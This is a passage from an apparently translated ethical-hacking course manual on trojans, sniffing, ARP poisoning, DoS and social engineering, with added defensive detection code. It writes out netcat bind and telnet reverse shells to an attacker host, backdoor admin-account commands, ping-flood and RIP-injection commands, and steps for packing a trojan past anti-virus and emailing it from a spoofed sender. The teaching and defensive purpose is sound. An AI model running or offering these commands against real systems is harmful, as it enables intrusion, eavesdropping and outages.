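

def masquerading(processes):
    """Processes that use a protected service name from outside that service's directory."""
    hits = []
    for p in processes:
        expected_dir = PROTECTED_NAMES.get(p.name.lower())
        if expected_dir is None:
            continue
        actual_dir = ntpath.dirname(p.image_path)
        if actual_dir.lower() != expected_dir.lower():
            hits.append(p)
    return hits


def hidden_pids(tasklist_view, probe_view):
    """Cross-view diff: PIDs that answer a direct probe but do not appear in tasklist."""
    visible = {p.pid for p in tasklist_view}
    return sorted(set(probe_view) - visible)


# Constructed sample data, modelled on the lab: 1236 is cehkeylogger.exe after `fu -ph 1236`,
# 1540 is a copy of the keylogger renamed svchost.exe in the user's profile.
TASKLIST = [
    Proc(4, "System", ""),
    Proc(592, "csrss.exe", r"C:\WINDOWS\system32\csrss.exe"),
    Proc(1032, "svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    Proc(1540, "svchost.exe", r"C:\Documents and Settings\hao\svchost.exe"),
]
PROBE_PIDS = [4, 592, 1032, 1236, 1540]

if __name__ == "__main__":
    for p in masquerading(TASKLIST):
        print(f"masquerade: pid {p.pid} {p.name} running from {p.image_path}")
    for pid in hidden_pids(TASKLIST, PROBE_PIDS):
        print(f"hidden from tasklist: pid {pid}")
```

A DKOM rootkit can only hide what it knows about, so the low-level view should come from a source it does not patch; a second cross-view on disk (directory listing versus raw file-system walk) catches the same rootkit hiding its files.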
Lesson 4:
TROJANS AND BACKDOORS
I/ Introduction to Trojans and Backdoors:
Trojans and backdoors are used to monitor the victim's machine and are the back door through which the hacker re-enters the computer system, either through a connection port or through the web environment (web-based). The port-based kind we commonly see are netcat, Beast, Donald Dick, etc.; the web-based kind are typically r57, c99, zehir4, etc. A characteristic of port-connecting trojans is that they must open a port for every connection, so an administrator detects them relatively easily compared with the web-based kind (which usually targets web servers). In this lab we try the features of netcat, Beast, c99 and zehir4, and analyze a sample piece of trojan code.
II/ Labs:
Lab 1: Using netcat:
1/ Using netcat to connect to a shell
On the victim's computer, start netcat in listening mode, using the -l (listen) option and -p port to specify the port to listen on; -e makes netcat execute a program when a connection arrives, usually a command shell: cmd.exe (on NT) or /bin/sh (on Unix).
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
- On the attacking computer, simply use netcat to connect to the victim on the port chosen above, e.g. 8080:
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
Now we have a shell and control the victim's machine. However, after the connection above, netcat on the victim exits as well. To make netcat keep listening after each connection, use -L instead of -l. Note: -L exists only in the Windows build of netcat, not in the Linux one.
2/ Using netcat with a reverse shell to bypass a firewall: use telnet on the victim to connect to a listening netcat window, pipe the commands read from that window through the reverse telnet into a shell, and send the shell's output to a second window.
Example:
- On the attacking machine (172.16.84.1), open two netcat windows listening on ports 80 and 25 respectively:
+ Netcat window (1)
C:\>nc -nvv -l -p 80
listening on [any] 80 ...
connect to [172.16.84.1] from [172.16.84.2] 1055
pwd
ls -la
_
+ Netcat window (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 bin
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 etc
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 lib
drwxr-xr-x 2 root root 7168 Dec 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 proc
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sbin
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var
- On the victim machine (172.16.84.2), reverse-telnet to the attacking machine (172.16.84.1), using /bin/sh to execute the commands:
[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_
Telnet on the victim passes everything we type into netcat window (1) (port 80) to /bin/sh for execution. The output of /bin/sh is sent back to the attacking computer into netcat window (2) (port 25). Your job is simply to type commands into window (1) and read the results in window (2).
Ports 80 and 25 are chosen because firewalls or filters usually do not block them.
Lab 2: Using the Beast trojan and detecting trojans.
To use the Beast trojan, we first have to build a server file that is installed on the victim's machine; this server file then listens on the configured port, and from the attacking machine we connect to the victim through that port.
Choose the Beast trojan on the CD and run the trojan builder.
Extra features can be enabled, such as AV-FW kill to disable the firewall on the target, or injecting into another file such as notepad.exe or explorer as a DLL. Use the Save Server button to produce server.exe, run that file on the victim, and check the victim's Task Manager to confirm the trojan is really running.
Now use the client program on the attacking machine to connect to the server file running on the victim's machine.
Try a few features, such as the file manager to download the files you want from the victim, or shutting down and rebooting the victim through the Windows tab.
Countermeasures: besides anti-virus and anti-trojan programs, you can rely on the fact that these trojans must open a port to the outside; the listening ports and the process owning each one can be seen with CurrPorts or fport.
From the information CurrPorts provides, you can delete the file cehclass.exe at its path and remove the entries about it in the registry, the Startup folder, and so on.
Lab 3: Using web-based trojans
Web-based trojans are more common in the web environment: after exploiting a vulnerability and taking over a web server, the hacker leaves a web-based trojan behind, through which he can get back into the system later. This kind is very hard to detect, because it runs as a web page and reaches the system through the functions of languages such as ASP or PHP, so it is not as easy to spot as connecting trojans such as netcat or Beast.
For this lab we first need to install web servers: IIS and Apache.
1/ Web trojans in ASP: we use the IIS web server with trojans written in this language; two representative ones are introduced, cmd.asp and zehir4.asp.
First install the IIS web service (the installation is simple; students can do this part themselves), then copy the two files into the www folder so they can be reached over the web.
Type the Dir command to list the files on the system. With a trojan like this we can view system information, upload and download through tftp, and add users to the system, for example net user hao hao /add and net localgroup administrators hao /add.
Open the link http://192.168.1.116/zehir4.asp to see the second web-based trojan.
This trojan is more graphical and more convenient: fetching and deleting files is done entirely through the web, so we can easily operate on the victim's machine.
2/ Trojans in PHP: we use the Apache web server with a trojan written in this language; the representative one introduced is c99.
First use the phpeasy program to install the three packages Apache, PHP and MySQL together; in this lab only PHP and Apache are needed. Copy the trojan files into the www folder so they can be run.
This is a very dangerous trojan: it can download and upload files, run applications such as Perl, execute system functions, report information about the current victim, and so on. Because of this, hackers use it very widely (others of the same kind are r57, phpshell, etc.).
Lesson 5:
SNIFFING METHODS
I/ Introduction to sniffers
A. SNIFFER OVERVIEW
A sniffer is simply a program that tries to listen to the flow of information on a network.
Sniffers are used as a tool by network administrators to monitor and maintain the network. On the negative side, a sniffer is used as a tool to eavesdrop on network traffic and obtain important information.
On a switched network a sniffer relies on an ARP attack to capture information transmitted between other hosts; on a shared medium, putting the card into promiscuous mode is enough.
However, the traffic between computer systems is usually binary data, so to make sense of it the sniffer programs must have protocol analysis features as well as the ability to decode the binary data.
Some sniffer applications in use are dsniff, snort, Cain, ettercap and Sniffer Pro.
B. HOW SNIFFERS WORK
On switched networks, sniffers operate mainly on the basis of ARP attacks.
ARP ATTACKS
1. Introduction
This is a very dangerous form of attack, called Man in the Middle. In this case, as with a phone tap, the session between the sending and receiving machines proceeds normally, so the user has no idea they are being attacked.
2. Outline of operation
On the same network, when Host A and Host B want to exchange data, the packets are passed down to the data link layer to be encapsulated, and the hosts must put the source and destination MAC addresses into the frame.
So before data can be transferred, the hosts must ask for each other's MAC addresses.
If Host A starts the MAC lookup, it broadcasts an ARP request to all hosts asking for Host B's MAC; at that point Host B has Host A's MAC, and Host B simply replies to Host A with its own MAC (ARP reply).
Now suppose a Host C continuously sends ARP replies to Host A and Host B containing Host C's MAC address but listing the IP addresses of Host A and Host B. Host A now believes that machine B has MAC C. So the packets Host A sends to Host B all arrive at Host C, and the packets Host B returns to Host A arrive at Host C as well. If Host C has forwarding enabled, Host A and Host B have no idea that they are under ARP attack.
Example:
We have a network of the following hosts:
Attacker: the hacker's machine used for the ARP attack
IP: 10.0.0.11
MAC: 0000.0000.1011
Victim: the attacked machine
IP: 10.0.0.12
MAC: 0000.0000.1012
HostA
IP: 10.0.0.13
MAC: 0000.0000.1013
- First, HostA wants to send data to Victim and needs Victim's MAC address to communicate. HostA broadcasts an ARP Request to all machines in the LAN asking which MAC address belongs to IP 10.0.0.12 (Victim's IP).
- Both Attacker and Victim receive the ARP Request, but only Victim sends an ARP Reply back to HostA. The ARP Reply carries IP 10.0.0.12 and Victim's MAC 0000.0000.1012.
- HostA receives the ARP Reply from Victim, learns that Victim's MAC is 0000.0000.1012, and starts communicating and transferring data to Victim. Attacker cannot see the data exchanged between HostA and Victim.
Attacker now wants to carry out an ARP attack on Victim, so that every packet HostA sends to Victim can be captured and read.
- Attacker continuously sends ARP Replies carrying Victim's IP 10.0.0.12 but Attacker's own MAC 0000.0000.1011.
- HostA receives these ARP Replies and believes that IP 10.0.0.12 (Victim) has MAC 0000.0000.1011. HostA stores this in its ARP cache and uses it for its connections.
- From now on, all information and data HostA sends to IP 10.0.0.12 (Victim) goes to MAC 0000.0000.1011, i.e. to Attacker's machine.
[Figure: Host A, Host B and Host C on the same network segment]
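The poisoned reply from the scenario above, built byte for byte, together with the check an arpwatch-style monitor applies to catch it: an IP whose MAC changes, or one MAC claiming two IPs. This is an added example, not part of the original lab; the addresses are the ones used in the text (written here as 00:00:00:00:10:1x), and the class and function names are this example's own.

```python
# Added example (not from the original lab): build, parse and watch ARP replies.
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace(".", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet frame carrying the ARP reply 'sender_ip is at sender_mac', sent to target."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # hardware type Ethernet, protocol IPv4, hw addr len 6, proto addr len 4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[14:22])
    body = frame[22:42]
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": op, "sender_mac": mac(body[0:6]), "sender_ip": ip(body[6:10]),
            "target_mac": mac(body[10:16]), "target_ip": ip(body[16:20])}


class ArpWatch:
    """Learn IP->MAC bindings from replies and report changes and duplicate MACs."""

    def __init__(self):
        self.table = {}   # ip -> mac

    def observe(self, frame: bytes):
        a = parse_arp(frame)
        if a["op"] != ARP_REPLY:
            return None
        ip, mac = a["sender_ip"], a["sender_mac"]
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is not None and old != mac:
            return f"{ip} changed {old} -> {mac}"
        others = [i for i, m in self.table.items() if m == mac and i != ip]
        if others:
            return f"{mac} claims {ip} and {', '.join(others)}"
        return None


ATTACKER, VICTIM, HOSTA = "00:00:00:00:10:11", "00:00:00:00:10:12", "00:00:00:00:10:13"

if __name__ == "__main__":
    watch = ArpWatch()
    # Step 2 of the scenario: Victim answers HostA honestly.
    print(watch.observe(build_arp_reply(VICTIM, "10.0.0.12", HOSTA, "10.0.0.13")))
    # Step 5: Attacker tells HostA that 10.0.0.12 is at Attacker's MAC.
    print(watch.observe(build_arp_reply(ATTACKER, "10.0.0.12", HOSTA, "10.0.0.13")))
    # The other half of a full MITM: Attacker tells Victim that 10.0.0.13 is at Attacker's MAC.
    print(watch.observe(build_arp_reply(ATTACKER, "10.0.0.13", VICTIM, "10.0.0.12")))
```

A host that accepts unsolicited replies (as the XP hosts in this lab do) updates its cache on the spoofed frame straight away; the monitor above sees exactly the same frames and is why arpwatch-style alerting on a mirror port is the usual detection.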
CAIN (Using the CAIN software)
1. Hardware requirements:
- 10 MB of free disk space
- Operating system Windows 2000/2003/XP
- WinPcap must be installed
2. Installation:
Click Next.
Click Next.
Click Finish.
3. Configuration
Cain & Abel needs a few parameters configured; everything can be adjusted through the Configuration dialog.
Sniffer tab:
- Here we choose the network card used for sniffing and for APR. Tick the option to enable or disable the feature.
- The sniffer works with WinPcap version 2.3 or later, which supports a very wide range of network cards.
APR tab:
- This is where ARP poisoning is configured. By default Cain re-sends its spoofed ARP packets to the victims every 30 seconds; this is necessary because the victims' ARP caches would otherwise expire and traffic would stop flowing through the attacker. From this dialog you set the interval between poisoning rounds: a low value generates more ARP traffic on the wire, a high value makes the poisoning less reliable.
- In this tab, pay attention to the Spoofing Options:
+ The first option uses the real MAC and IP address of the machine you are working on.
+ The second option lets you use a spoofed IP and MAC address.
(Note that the address you choose must not collide with another host's IP.)
Clicking the Filters and Ports tab shows the protocols and the port numbers assigned to each protocol.
Filters and Ports tab:
- Here you can enable or disable the individual TCP/UDP application ports.
HTTP Fields tab:
- Here is the list of username and password field names that the HTTP sniffer filter uses. This tab tells you which web form fields the program captures:
+ Username Fields: anything related to a name (user name, account, web name, etc.).
+ Password Fields: the password-related fields (login password, user pass, webpass, etc.).
4. Cain's features:
+ Protected Storage password manager:
Protected Storage is used as a private store that protects certain data for the user. Most of the information in Protected Storage is encrypted with a key derived from the user's logon password, so that only the owner can access it. Several Windows applications use this service: Internet Explorer, Outlook, Outlook Express.
+ Credential manager password decoder:
Credential Manager lets you store user names and passwords for another network resource or an application, after which the system supplies them automatically on later visits without your intervention.
+ LSA secrets dumper:
LSA secrets hold the password information for the accounts used to start services, and other local data. Dial-Up and some other applications keep their passwords here.
+ Dial-Up password decoder:
+ APR:
APR (ARP Poison Routing) is the program's main feature. It allows sniffing on switched networks and hijacking the IP traffic between hosts.
APR works by manipulating the hosts' ARP caches. On an IP over Ethernet network, two hosts that want to talk must know each other's MAC address. The source host looks in its ARP cache for a MAC address matching the destination IP; if none is found, it broadcasts an ARP request asking for the MAC of that address. Because the request is broadcast it reaches every host on the subnet, but only the host that owns the IP address is supposed to reply with its MAC; the source then stores the IP-MAC pair in its ARP cache. Cain abuses this by sending ARP poison packets that bind the victims' IP addresses to the attacker's MAC.
Configuration: a few parameters must be set, namely which MAC and IP addresses to impersonate in the ARP poison packets. Such an attack is hard to trace because the attacker never has to put his own IP address on the wire; he sits in the middle and observes.
In the figure above we want to attack the traffic between 192.168.0.1 and 192.168.0.10. Working as the man in the middle, the program performs the ARP poisoning; Cain can run attacks against many hosts at the same time, and you select an address from the list on the left.
+ Service manager: you can start/stop, pause/continue or remove any service listed in the window.
+ Sniffer:
APR-DNS:
This feature lets you spoof DNS by forging a DNS reply to the host under attack.
APR-DNS simply rewrites the IP address in the DNS reply. The sniffer extracts the requested name from the packet and looks it up in the list you configured; the reply's IP address is rewritten and the packet is re-routed. The client is fooled into using the address you chose.
APR-HTTPS:
APR-HTTPS allows capturing and decrypting the HTTPS traffic between hosts; it works together with the Certificate Collector. When the victim starts an HTTPS session, his browser shows a pop-up certificate warning, which is the one visible sign of the attack.
+ Certificates Collector:
ETTERCAP
1. Introduction
Ettercap is a program that analyzes the packets sent over a network, so it is also an effective tool for sniffing data on a LAN, including encrypted traffic. Ettercap can impersonate the MAC address of the attacked machine's network card, so that packets meant for the target computer are delivered to the machine running ettercap and only then forwarded to the real destination.
2. Installing on Linux
Before installing, prepare the following three packages:
+ ettercap-NG-0.7.1.tar, downloadable from http://prdownloads.sourceforge.net/ettercap
+ libpcap-0.8.1.tar
+ libnet-1.1.2.1.tar, downloadable from http://www.packetfactory.net/libnet/dist/
Install libnet:
1. # tar zxvf libnet-1.1.2.1.tar.gz
2. # cd libnet
3. # ./configure
4. # make
5. # make install
Install libpcap:
6. # tar zxvf libpcap-0.8.1.tar.gz
7. # cd libpcap
8. # ./configure
9. # make
10. # make install
Install ettercap:
1. # tar zxvf ettercap-NG-0.7.1.tar.gz
2. # cd ettercap-NG-0.7.1
3. # ./configure
4. # make
5. # make install
When the installation completes, the console window shows the corresponding messages.
3. Configuring and using Ettercap
- Open the Ettercap interface by typing the command
# ettercap -C
- Before configuring, check whether the Promisc mode option is ticked; if not, tick it.
- In the Sniff menu, choose Unified sniffing...
- Choose the network card to use.
- To start listening, choose Start, then Start sniffing.
The User messages line shows a notification that the service has started.
- In the Hosts menu, choose Scan for hosts.
- In the Mitm menu, choose Arp poisoning.
- Do not select any parameters; press Enter to skip. The User messages line shows a notification.
- To view the scanned hosts, choose Connections in the View menu.
To capture, select a host marked as active; the captured packets appear, displayed in encoded form.
- Choose Log all packets and infos in the Logging menu to save log files containing the captured packets.
- To read the captured packets in decoded form, type the following in the console window:
# etterlog -p -k -i ascii logfile.eci | less
4. Ettercap features
Ettercap provides a number of plug-ins; by selecting them you can use several important ettercap functions.
Ettercap also has two very important plug-ins, arpcop and leech.
They let you use Ettercap itself to protect your own machine against other sniffers on the network.
1. Arpcop: if you suspect someone is sniffing on the network, start ettercap and select this plug-in; whether the other party uses ettercap or dsniff, you can still find them, and a new window lists the computers running ARP spoofing programs on the network.
2. Leech: once the attacker has been identified, you can isolate that computer from the network immediately with this plug-in. Ettercap can also be used to find virus-infected machines that are spreading on the network, isolate them with leech, and then clean them with anti-virus programs, which is very effective.
Lesson 6:
Denial of Service (DoS) attacks
I/ Introduction:
What is a DoS attack? (Denial of Service attack)
A DoS attack (denial of service attack) is a very effective type of attack: with it you need only one computer connected to the Internet to attack the opponent's computer. The essence of a DoS attack is that the hacker consumes a large amount of resources on the server (bandwidth, memory, CPU, disk, etc.) so that the server can no longer respond to requests from other machines (those of ordinary users), and the server may quickly stop working, crash or reboot.
The DoS attack types currently known and in use:
a.) Winnuke:
- This DoS attack only applies to computers running Windows 9x. The hacker sends packets with Out of Band data to port 139 of the target computer (port 139 is the NetBIOS port; this port only accepts packets with the Out of Band flag set). When the victim's computer receives such a packet, a blue screen error is displayed to the victim, because the Windows program receives the packets but does not know how to react to Out of Band data, which leads to a system crash.
b.) Ping of Death:
- In this DoS attack you just send a large packet to the target via the ping command and its system hangs.
- E.g.: ping -l 65000
c.) Teardrop:
- As we know, all data transferred over the network from the source system to the destination system goes through two steps: the data is split into small fragments at the source, each fragment carrying an offset value that identifies its position within the transferred datagram. When the fragments reach the destination, the destination uses the offset values to reassemble them in the original order. Exploiting this, we only need to send the target a series of packets whose offset values overlap. The target cannot reassemble these packets, loses control, and may crash, reboot or stop working if the number of packets with overlapping offsets is large enough!
d.) SYN Attack:
- In a SYN attack, the hacker sends the target a series of SYN packets with bogus source IP addresses. When the target receives these SYN packets it replies to the bogus addresses and waits for a response from the fake IPs. Because these addresses are not real, the target waits and waits, and has to keep these pending requests in memory, wasting a significant amount of server memory that should be used for other things rather than waiting for responses that never come. If we send many packets with spoofed IP addresses at the same time, the system is overloaded and crashes or reboots. ==> lie back and fold your arms.
e.) Land Attack:
- A Land attack is much like a SYN attack, but instead of bogus IP addresses the hacker uses the victim system's own IP address. This creates an endless loop inside the victim system itself, between one side waiting for a reply and the other side never able to send one. ==> cause a traffic jam.
f.) Smurf Attack:
- A Smurf attack has three components: the hacker (who orders the attack), the amplifier network (which obeys the hacker's orders), and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets carry the victim's IP as their source address. When the packets reach the broadcast address of the amplifier network, all the computers in that network believe the victim sent them ICMP packets, and they all reply to the victim's system with ICMP replies. The victim's system cannot withstand the enormous volume of packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the hacker has the amplifier network multiply them many times over; the amplification ratio depends on the number of computers in the amplifier network. The hacker's task is to capture as many networks or routers as possible that forward packets directly to the broadcast address without filtering source addresses on the outbound side. With such systems in hand, the hacker easily launches Smurf attacks on the systems he wants to attack. ==> one machine makes the rest thunder; just a few machines and you lose.
g.) UDP Flooding:
- A UDP attack needs two systems to take part. The hacker makes his own system enter a loop that exchanges data over UDP: he spoofs the packets' IP address as the loopback address (127.0.0.1) and sends them to the victim's system on the UDP echo port (7). The victim's system replies to the messages sent by 127.0.0.1 (itself), and the result is an endless loop. However, many systems do not allow the loopback address, so the hacker spoofs the IP address of some computer on the victim's network and floods UDP on the victim's system. If you do this and it does not succeed, your own machine is the one that falls over.
h.) DNS attack:
- The hacker can exploit a vulnerability in the victim system's Domain Name Server and point it at some website of the hacker's. When a client asks the DNS to resolve the compromised address to an IP address, the DNS (whose temporary cache the hacker has altered) immediately returns the IP address the hacker pointed it to. The result is that instead of the website they wanted, the victims end up on a website created by the hacker. A really effective way of denying service!
i.) Distributed DoS Attacks (DDoS):
- DDoS requires at least a few hackers working together. First the hackers break into poorly secured computer networks and install the DDoS server program on those systems. Then the hackers agree on a time, use the DDoS client to connect to the DDoS servers, and order all of these DDoS servers to launch the DDoS attack on the victim's system at once.
j.) DRDoS (The Distributed Reflection Denial of Service Attack):
- This is probably the most devastating type of attack and knocks out the opponent's computer fastest. It works much like DDoS, but instead of attacking from many computers the attacker only needs one, attacking through the big servers around the world. Again using spoofing of the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo, and these servers reply to the victim's address. Receiving so many packets at once through these big servers quickly saturates the victim's link and crashes or reboots the computer. This attack is dangerous because a single ordinary Internet-connected machine can bring down any system with the best link in the world if it is not stopped in time. Our HVA website was DoSed this way recently.
(Quoted from Netsky (vniss))
II/ Lab description:
Lab 1: DoS using ping of death.
Besides tools such as Nemesy, you can also start a "ping of death" with the following command:
For /L %i in (1,1,100) do start ping [ip victim] -l 10000 -t
Strictly speaking this is a ping flood (100 concurrent pings with 10000-byte payloads, sent continuously); it does not send the oversized datagram of the classic Ping of Death, which current IP stacks reject.
You can run this command several times to DoS the client machine completely.
Lab 2: DoS against a protocol that does not use authentication (RIP in this lab)
In this lab we use a Cisco router running RIP version 1 and the Nemesis tool from a Linux boot CD to inject RIP update messages into the router. The router stores every update it receives in its routing table, so by running Nemesis many times we fill up the router's memory.
First try the following command:
nemesis rip -V 1 -c 2 -i 192.168.5.0 -S 192.168.1.51 -D 192.168.1.254
Here -V 1 means we are using RIP version 1, -c 2 is command 2, a response (a routing update), -i 192.168.5.0 is the route we advertise, -S 192.168.1.51 is the source address of the update (it need not be the PC's own address), and -D 192.168.1.254 is the address of fa0/0 on router VSIC1. After running this command, check whether the router has the route; then write a script with many different routes and run it.
Injecting packets into the router
The router's memory overflows

The router's routing table during the attack
So by injecting update messages into a protocol that has no authentication, we can stop the router from working. This shows the importance of authentication: RIPv1 has none, while RIPv2 supports plaintext and MD5 authentication (on Cisco IOS, ip rip authentication mode md5 together with ip rip authentication key-chain on the interface), and interfaces that face hosts rather than routers should be made passive so that no updates are accepted from them at all. Nemesis has many more options and supports other protocols such as ARP and OSPF; students can test the remaining protocols on their own.
Lab 3: DDoS using Flash

Besides attacking directly through protocols such as RIP, OSPF and ARP, a hacker can also upload Flash files to forums; when a user plays the Flash file (it may look like a video clip), it also sends an HTTP POST to the victim. So if the file is uploaded to many forums and watched by many people at the same time, the browsers of the forums' visitors unknowingly DoS the victim server.

Use the Flash file on the CD (Module 8), run it in Internet Explorer and analyze the traffic with the WebScarab proxy.
The Flash file opens many Internet Explorer windows, and each one sends an HTTP POST to the victim server.
Lesson 7:
Social Engineering

I/ Introduction
Social Engineering is a trick many hackers use in their intrusions into networks and computer systems. It is one of the most effective methods for stealing passwords and information and attacking systems.

Below is a true story about one of the most famous hackers in the world in recent years, Kevin Mitnick (USA, who served 8 years in prison for attacking computer systems), a leading expert in Social Engineering. Planning an attack on company X, Kevin used this skill to dig up information about the general director and one of his assistants. Taking advantage of the two being away on a business trip, he used a fake Caller ID, imitated the assistant's voice and called the company's network administrator, asking for the general director's login password because the boss had forgotten it. The administrator checked a few details about the "assistant", but Kevin had enough information and wit to answer. As a result, Kevin obtained the password and took control of company X's entire network.

Another form of fraud: one bad day you get a phone call, and a sweet voice on the other end says: "Hello sir, the service you are using at our company currently has a problem with your account. Please send us your account information right away so we can correct it." At first it sounds like a crude scam, but the success rate is very high, especially when the voice is as lovely as the operators on the 1080 hotline! A similar fraud uses the "Fake Email Login" technique. In principle, every time we log in to a mailbox we must enter our account information, username and password, and send it to the mail server for processing. Exploiting this, hackers have designed fake login pages (Fake Login) so that the information is sent to them instead.

In short, Social Engineering techniques are very varied and rich, and also extremely dangerous because of their effectiveness and prevalence. The technique does not require many technical elements, and may not involve pure technology at all (non-technical). A hacker can carry it out through letters, e-mail, telephone, face-to-face contact, acquaintances, personal relationships... to lure users into revealing information inadvertently. In Vietnam the technique is still fairly new, so cases of people being fooled easily are not rare. For example, last year a whole string of MU Global players lost all their (virtual) assets after naively entering their account information into a hacker's e-mail posing as the MU admin!
(Quoted)

II/ Labs:

Lab 1: Sending an anonymous email with a Trojan attached
To carry out this lab we use the Mini-binder program to bind the trojan file to an image and change its icon, and Outlook to send the anonymous email.

Binding the image and the trojan: first create a trojan file, then take any image file and any .ico file to bind with it.

The command MMB 60.ico svchost.exe cathu.jpg trojanhao.exe binds the trojan svchost.exe with cathu.jpg, using 60.ico as the icon and producing trojanhao.exe.

Next, compress the new trojan file with WinRAR several times to evade anti-virus (this depends on the anti-virus version; most trojans do not get past these programs), and change the Outlook account information.
Go to Tools → Options → Mail Setup → View Accounts, select the account to change, and change the Your Name and E-mail Address fields. Nothing in SMTP verifies these fields; only checks on the receiving side (SPF, DKIM and DMARC, and the Received: trail the mail servers stamp) can expose the forgery.

Then attach the file and send the email. In this lab the author sent it to the address [email protected] and then checked the mailbox to see whether the mail had arrived.
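A receiving-side check for the forgery this lab performs, as an added example (this is not the course's material or any product's code): the From: header is whatever the sender typed into Outlook, but the envelope sender the receiving MTA records as Return-Path and the Received: lines each hop stamps are not under the sender's control, so comparing their domains with the From: domain exposes the spoof. The two messages below are constructed for the example; corp.example, freemail.example and the host names in them are invented.

```python
"""Spotting a forged From: header from the trail the mail system adds.

Added example, not the course's material. Lab 1 forges the sender merely by
editing "Your Name" and "E-mail Address" in Outlook, so From: is attacker-chosen
text. The envelope sender (recorded as Return-Path by the receiving MTA) and
the Received: lines that each hop stamps are not, and comparing their domains
with the From: domain is the first check a mail gateway or analyst applies.
"""
import email
import email.utils
import re


def domain_of(addr: str) -> str:
    """Domain part of an address header value such as 'IT Support <it@corp.example>'."""
    return email.utils.parseaddr(addr)[1].rpartition("@")[2].lower()


def received_hosts(msg) -> list:
    """Host named in the 'from <host>' clause of each Received: header, outermost first."""
    hosts = []
    for hdr in msg.get_all("Received", []):
        m = re.search(r"\bfrom\s+([A-Za-z0-9.-]+)", hdr)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def spoof_indicators(raw: str) -> list:
    """Return the reasons (possibly none) why From: should not be trusted."""
    msg = email.message_from_string(raw)
    from_dom = domain_of(msg.get("From", ""))
    reasons = []
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if rp_dom and rp_dom != from_dom:
        reasons.append(f"Return-Path domain {rp_dom} != From domain {from_dom}")
    hosts = received_hosts(msg)
    # The last (innermost) Received: names the host that handed the mail to the
    # first MTA, i.e. the sender's real origin.
    if hosts and not hosts[-1].endswith(from_dom):
        reasons.append(f"origin host {hosts[-1]} is outside {from_dom}")
    reply_dom = domain_of(msg.get("Reply-To", ""))
    if reply_dom and reply_dom != from_dom:
        reasons.append(f"Reply-To domain {reply_dom} != From domain {from_dom}")
    return reasons


# Constructed samples (all domains and hosts are invented for this example).
SPOOFED = """\
Return-Path: <jb4x@freemail.example>
Received: from mx1.freemail.example (mx1.freemail.example [203.0.113.10]) by mail.corp.example; Mon, 1 Jan 2007 10:00:00 +0700
Received: from attacker-pc (dsl-pool.isp.example [198.51.100.7]) by mx1.freemail.example; Mon, 1 Jan 2007 09:59:50 +0700
From: IT Support <it@corp.example>
Reply-To: <jb4x@freemail.example>
To: <staff@corp.example>
Subject: Holiday photo

See the attached picture.
"""

LEGIT = """\
Return-Path: <hr@corp.example>
Received: from smtp.corp.example (smtp.corp.example [192.0.2.25]) by mail.corp.example; Mon, 1 Jan 2007 10:05:00 +0700
From: HR <hr@corp.example>
To: <staff@corp.example>
Subject: Timesheets

Reminder to submit timesheets.
"""

if __name__ == "__main__":
    for reason in spoof_indicators(SPOOFED):
        print("spoofed:", reason)
    print("legit:", spoof_indicators(LEGIT))
```

The forged message from Lab 1 trips all three checks: its Return-Path and Reply-To point at the mailbox the attacker really controls, and the innermost Received: line names a host outside the domain From: claims. Only the headers added by the receiving side can be relied on; anything the sender's client writes, including Message-ID and Date, is as forgeable as From:.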
Lesson 8:
Session Hijacking

I/ Introduction:
